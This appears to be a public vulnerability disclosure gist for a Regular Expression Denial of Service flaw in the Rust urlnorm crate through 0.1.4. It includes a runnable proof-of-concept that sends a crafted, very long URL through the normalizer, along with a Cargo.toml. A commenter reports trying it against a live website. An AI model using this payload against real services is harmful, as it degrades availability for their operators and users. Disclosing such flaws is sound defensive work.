@6en6ar
Created June 20, 2023 22:39
Public disclosure of a vulnerability in the urlnorm crate through 0.1.4 for Rust
Regex Denial of Service in the urlnorm package on https://crates.io/crates/urlnorm

The urlnorm crate through 0.1.4 for Rust allows Regular Expression Denial of Service (ReDoS) via a crafted URL passed to lib.rs. The regex defined on line 37 of https://github.com/progscrape/urlnorm/blob/main/src/lib.rs, which is used to trim .html and other extensions when normalizing a URL, is vulnerable to ReDoS when malicious input is provided.
PoC code:
```rust
use std::time::Instant;

use url::Url;
use urlnorm::UrlNormalizer;

fn main() {
    println!("[ + ] Testing urlnorm package");

    // Build a malicious path: 50,000 repetitions of "A5.html" (~350 KB).
    let payload = "A5.html".repeat(50_000);

    let norm = UrlNormalizer::default();

    let mut url_input = "https://goooooooogle.com/hello/index.html/".to_owned();
    url_input.push_str(&payload);
    url_input.push_str("\x00");

    let url = Url::parse(&url_input).unwrap();
    println!("{:?}", url);

    // Time the normalization step that exercises the extension-trimming regex.
    let start = Instant::now();
    let normalized = norm.compute_normalization_string(&url);
    // let normalized = norm.normalize_host(&url).unwrap();
    println!("[ + ] Url -> {:?}", normalized);
    println!("[ + ] Time elapsed {:?}", start.elapsed());
}
```
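
To run the PoC, only the url and urlnorm crates are needed. Below is a minimal Cargo.toml sketch, assuming urlnorm is pinned to the affected 0.1.4 release; the package name and the url crate version are assumptions (any recent 2.x release of url should work).

```toml
[package]
name = "urlnorm-redos-poc"   # hypothetical package name for this PoC
version = "0.1.0"
edition = "2021"

[dependencies]
# Pin the affected release described above.
urlnorm = "=0.1.4"
# Needed for Url::parse; any recent 2.x release should work.
url = "2"
```

Running the PoC with cargo run --release and comparing the elapsed time printed at the end against a normal-length URL should show the disproportionate slowdown on the crafted input.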
@TouchstoneTheDev

Has this vulnerability been patched by the dev?
I tried it on the website and got "Error: PersistError(UnexpectedError("Storage fetch panicked"))".
